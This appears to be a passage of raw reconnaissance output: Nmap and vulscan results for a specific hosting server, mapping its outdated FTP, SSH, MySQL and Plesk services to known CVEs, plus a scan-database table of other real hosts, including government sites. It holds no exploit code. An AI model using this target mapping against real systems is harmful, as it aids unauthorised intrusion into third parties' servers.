2506|_Not valid after: 2016-01-27T11:06:14
2507|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
2508| tls-nextprotoneg:
2509|_ ftp
251022/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2511| ssh-hostkey:
2512| 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
2513|_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
251480/tcp open http Apache httpd (PleskLin)
2515|_http-favicon: Parallels Control Panel
2516|_http-server-header: Apache
2517|_http-title: Domain Default page
2518443/tcp open ssl/http Apache httpd (PleskLin)
2519|_http-favicon: Parallels Control Panel
2520|_http-server-header: Apache
2521|_http-title: Domain Default page
2522| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
2523| Not valid before: 2015-01-27T11:06:14
2524|_Not valid after: 2016-01-27T11:06:14
2525|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
25263306/tcp open mysql MySQL 5.1.73
2527| mysql-info:
2528| Protocol: 10
2529| Version: 5.1.73
2530| Thread ID: 574774
2531| Capabilities flags: 63487
2532| Some Capabilities: Support41Auth, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, Speaks41ProtocolOld, LongPassword, SupportsTransactions, IgnoreSpaceBeforeParenthesis, FoundRows, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, ODBCClient, SupportsCompression, InteractiveClient
2533| Status: Autocommit
2534|_ Salt: =k'yO^m)"ky=bWm>/kR9
25354643/tcp open ssl/http Apache httpd
2536|_http-server-header: Apache
2537| http-title: Parallels Power Panel - s18161039.onlinehome-server.info
2538|_Requested resource was https://s18161039.onlinehome-server.info:4643/vz/cp
2539| ssl-cert: Subject: commonName=vhn.schlund.de/organizationName=Parallels, Inc./stateOrProvinceName=VA/countryName=US
2540| Not valid before: 2016-02-28T21:02:46
2541|_Not valid after: 2017-02-27T21:02:46
2542|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
25438443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
2544|_http-favicon: Parallels Plesk
2545| http-robots.txt: 1 disallowed entry
2546|_/
2547|_http-server-header: sw-cp-server
2548|_http-title: Plesk Onyx 17.8.11
2549| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
2550| Not valid before: 2015-01-27T11:06:14
2551|_Not valid after: 2016-01-27T11:06:14
2552|_ssl-date: 2020-01-05T08:53:40+00:00; -3s from scanner time.
2553| tls-nextprotoneg:
2554|_ http/1.1
25558880/tcp open http sw-cp-server httpd (Plesk Onyx 17.8.11)
2556|_http-favicon: Parallels Plesk
2557| http-robots.txt: 1 disallowed entry
2558|_/
2559|_http-server-header: sw-cp-server
2560|_http-title: Plesk Onyx 17.8.11
2561Device type: general purpose|router|storage-misc|WAP|broadband router|media device
2562Running (JUST GUESSING): Linux 2.6.X|3.X (93%), MikroTik RouterOS 6.X (91%), HP embedded (89%), Ubiquiti embedded (89%), Infomir embedded (88%), Netgear RAIDiator 4.X (88%)
2563OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:6.32.1 cpe:/h:hp:p2000_g3 cpe:/h:ubnt:airmax_nanostation cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/o:netgear:raidiator:4.2.21
2564Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 - 3.1 (92%), Linux 2.6.32 - 3.13 (92%), MikroTik RouterOS 6.32.1 (91%), Linux 3.10 (91%), Linux 2.6.32 - 2.6.39 (90%), Linux 2.6.39 (90%), Linux 3.2 (90%), HP P2000 G3 NAS device (89%), Linux 3.5 (89%)
2565No exact OS matches for host (test conditions non-ideal).
2566Network Distance: 13 hops
2567Service Info: Host: hn1556.rtr.schlund.de
2568
2569Host script results:
2570|_clock-skew: mean: -3s, deviation: 0s, median: -3s
2571
2572TRACEROUTE (using port 554/tcp)
2573HOP RTT ADDRESS
25741 127.28 ms 10.246.204.1
25752 127.32 ms 104.245.145.177
25763 127.36 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
25774 127.35 ms toro-b1-link.telia.net (62.115.168.48)
25785 97.11 ms toro-b3-link.telia.net (62.115.116.180)
25796 55.66 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
25807 155.48 ms ldn-bb3-link.telia.net (62.115.113.21)
25818 155.51 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
25829 187.10 ms ffm-bb3-link.telia.net (62.115.123.12)
258310 187.18 ms ae-1.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.3)
258411 155.57 ms ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11)
258512 ...
258613 155.55 ms s18161039.onlinehome-server.info (217.160.131.142)
2587####################################################################################################################################
2588Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:53 EST
2589Warning: 217.160.131.142 giving up on port because retransmission cap hit (2).
2590Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
2591Host is up (0.16s latency).
2592
2593PORT STATE SERVICE VERSION
259453/tcp closed domain
259567/tcp closed dhcps
259668/tcp closed dhcpc
259769/tcp closed tftp
259888/tcp closed kerberos-sec
2599123/tcp closed ntp
2600137/tcp closed netbios-ns
2601138/tcp closed netbios-dgm
2602139/tcp closed netbios-ssn
2603161/tcp closed snmp
2604162/tcp closed snmptrap
2605389/tcp closed ldap
2606520/tcp closed efs
26072049/tcp closed nfs
260853/udp open|filtered domain
260967/udp closed dhcps
261068/udp closed dhcpc
261169/udp open|filtered tftp
261288/udp open|filtered kerberos-sec
2613123/udp closed ntp
2614137/udp filtered netbios-ns
2615138/udp filtered netbios-dgm
2616139/udp closed netbios-ssn
2617161/udp open|filtered snmp
2618162/udp closed snmptrap
2619389/udp closed ldap
2620520/udp closed route
26212049/udp closed nfs
2622Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2623Device type: power-device|router
2624Running: Fronius embedded, MikroTik RouterOS 6.X
2625OS CPE: cpe:/h:fronius:datalogger_web cpe:/o:mikrotik:routeros:6.32.1
2626OS details: Fronius Datalogger Web, MikroTik RouterOS 6.32.1
2627Network Distance: 16 hops
2628
2629TRACEROUTE (using port 162/tcp)
2630HOP RTT ADDRESS
26311 85.57 ms 10.246.204.1
26322 161.89 ms 104.245.145.177
26333 161.93 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9)
26344 161.96 ms te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37)
26355 53.66 ms toro-b3-link.telia.net (62.115.116.180)
26366 63.17 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
26377 163.36 ms ldn-bb3-link.telia.net (62.115.113.21)
26388 163.40 ms prs-bb3-link.telia.net (62.115.134.92)
26399 163.44 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
264010 163.47 ms ffm-b1-link.telia.net (62.115.141.237)
264111 163.45 ms ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11)
264212 163.48 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
264313 163.54 ms ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35)
264414 163.54 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
264515 ...
264616 128.78 ms s18161039.onlinehome-server.info (217.160.131.142)
2647####################################################################################################################################
2648Hosts
2649=====
2650
2651address mac name os_name os_flavor os_sp purpose info comments
2652------- --- ---- ------- --------- ----- ------- ---- --------
265380.82.79.116 no-reverse-dns-configured.com Linux 7.0 server
265487.247.240.207 crayford.servers.prgn.misp.co.uk Android 5.X device
265593.174.93.84 Linux 3.X server
2656163.247.52.17 www.mtt.cl Linux 2.6.X server
2657163.247.96.10 Linux 2.6.X server
2658170.246.172.178 host-170-246-172-178.anacondaweb.com Linux 2.6.X server
2659185.68.93.22 verbatim1981.example.com Unknown device
2660186.67.91.110 ipj10-110.poderjudicial.cl Linux 2.6.X server
2661194.18.73.2 www.sakerhetspolisen.se Linux 2.6.X server
2662194.39.164.140 194.39.164.140.srvlist.ukfast.net Linux 3.X server
2663200.35.157.77 srv77.talcaguia.cl Unknown device
2664201.131.38.40 Linux 2.6.X server
2665217.160.131.142 s18161039.onlinehome-server.info Linux 2.6.X server
2666
2667Services
2668========
2669
2670host port proto name state info
2671---- ---- ----- ---- ----- ----
3048217.160.131.142 21 tcp ftp open ProFTPD
3049217.160.131.142 22 tcp ssh open OpenSSH 5.3 protocol 2.0
3050217.160.131.142 53 tcp domain closed
3051217.160.131.142 53 udp domain unknown
3052217.160.131.142 67 tcp dhcps closed
3053217.160.131.142 67 udp dhcps unknown
3054217.160.131.142 68 tcp dhcpc closed
3055217.160.131.142 68 udp dhcpc closed
3056217.160.131.142 69 tcp tftp closed
3057217.160.131.142 69 udp tftp unknown
3058217.160.131.142 80 tcp http open Apache httpd PleskLin
3059217.160.131.142 88 tcp kerberos-sec closed
3060217.160.131.142 88 udp kerberos-sec unknown
3061217.160.131.142 123 tcp ntp closed
3062217.160.131.142 123 udp ntp unknown
3063217.160.131.142 137 tcp netbios-ns closed
3064217.160.131.142 137 udp netbios-ns filtered
3065217.160.131.142 138 tcp netbios-dgm closed
3066217.160.131.142 138 udp netbios-dgm filtered
3067217.160.131.142 139 tcp netbios-ssn closed
3068217.160.131.142 139 udp netbios-ssn closed
3069217.160.131.142 161 tcp snmp closed
3070217.160.131.142 161 udp snmp unknown
3071217.160.131.142 162 tcp snmptrap closed
3072217.160.131.142 162 udp snmptrap closed
3073217.160.131.142 389 tcp ldap closed
3074217.160.131.142 389 udp ldap closed
3075217.160.131.142 443 tcp ssl/http open Apache httpd PleskLin
3076217.160.131.142 520 tcp efs closed
3077217.160.131.142 520 udp route unknown
3078217.160.131.142 2049 tcp nfs closed
3079217.160.131.142 2049 udp nfs closed
3080217.160.131.142 3306 tcp mysql open MySQL 5.1.73
3081217.160.131.142 4643 tcp ssl/http open Apache httpd
3082217.160.131.142 8443 tcp ssl/http open sw-cp-server httpd Plesk Onyx 17.8.11
3083217.160.131.142 8880 tcp http open sw-cp-server httpd Plesk Onyx 17.8.11
#####################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:32 EST
Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
Host is up (0.14s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| vulscan: VulDB - https://vuldb.com:
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
| [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652.
| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
| [CVE-2010-4052] Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
| [CVE-2010-4051] The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a "RE_DUP_MAX overflow."
| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
| [CVE-2007-2165] The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.
| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
| [CVE-2005-0484] Format string vulnerability in gprostats for GProFTPD before 8.1.9 may allow remote attackers to execute arbitrary code via an FTP transfer with a crafted filename that causes format string specifiers to be inserted into the ProFTPD transfer log.
| [CVE-2004-1602] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.
| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
| [CVE-2004-0432] ProFTPD 1.2.9 treats the Allow and Deny directives for CIDR based ACL entries as if they were AllowAll, which could allow FTP clients to bypass intended access restrictions.
| [CVE-2004-0346] Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.
| [CVE-2003-0831] ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
| [CVE-2003-0500] SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.
| [CVE-2001-1501] The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service (CPU and memory consumption) via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences in the argument.
| [CVE-2001-1500] ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged.
| [CVE-2001-0456] postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended.
| [CVE-2001-0318] Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory (cwd).
| [CVE-2001-0136] Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
| [CVE-2001-0027] mod_sqlpw module in ProFTPD does not reset a cached password when a user uses the "user" command to change accounts, which allows authenticated attackers to gain privileges of other users.
| [CVE-2000-0574] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.
| [CVE-1999-1475] ProFTPd 1.2 compiled with the mod_sqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command.
| [CVE-1999-0911] Buffer overflow in ProFTPD, wu-ftpd, and beroftpd allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
| [CVE-1999-0368] Buffer overflows in wuarchive ftpd (wu-ftpd) and ProFTPD lead to remote root access, a.k.a. palmetto.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
|
| Exploit-DB - https://www.exploit-db.com:
|
| OpenVAS (Nessus) - http://www.openvas.org:
|
| SecurityTracker - https://www.securitytracker.com:
|
| OSVDB - http://www.osvdb.org:
3411|_
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
3413| vulscan: VulDB - https://vuldb.com:
3414| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
3415| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
3416| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
3417| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
3418|
3419| MITRE CVE - https://cve.mitre.org:
3420| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
3421| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
3422| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
3423| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
3424| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
3425| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
3426| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
3427| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
3428| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
3429|
3430| SecurityFocus - https://www.securityfocus.com/bid/:
3431| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
3432| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
3433| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
3434| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
3435| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
3436| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
3437| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
3438| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
3439| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
3440| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
3441| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
3442| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
3443| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
3444| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
3445| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
3446| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
3447| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
3448| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
3449| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
3450| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
3451| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
3452| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
3453| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
3454| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
3455| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
3456| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
3457| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
3458| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
3459| [75990] OpenSSH Login Handling Security Bypass Weakness
3460| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
3461| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
3462| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
3463| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
3464| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
3465| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
3466| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
3467| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
3468| [61286] OpenSSH Remote Denial of Service Vulnerability
3469| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
3470| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
3471| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
3472| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
3473| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
3474| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3475| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
3476| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
3477| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3478| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
3479| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
3480| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
3481| [30794] Red Hat OpenSSH Backdoor Vulnerability
3482| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
3483| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
3484| [28531] OpenSSH ForceCommand Command Execution Weakness
3485| [28444] OpenSSH X Connections Session Hijacking Vulnerability
3486| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
3487| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
3488| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
3489| [20956] OpenSSH Privilege Separation Key Signature Weakness
3490| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
3491| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
3492| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
3493| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
3494| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
3495| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
3496| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
3497| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
3498| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
3499| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
3500| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
3501| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
3502| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
3503| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
3504| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
3505| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
3506| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
3507| [6168] OpenSSH Visible Password Vulnerability
3508| [5374] OpenSSH Trojan Horse Vulnerability
3509| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
3510| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3511| [4241] OpenSSH Channel Code Off-By-One Vulnerability
3512| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
3513| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
3514| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
3515| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
3516| [2917] OpenSSH PAM Session Evasion Vulnerability
3517| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
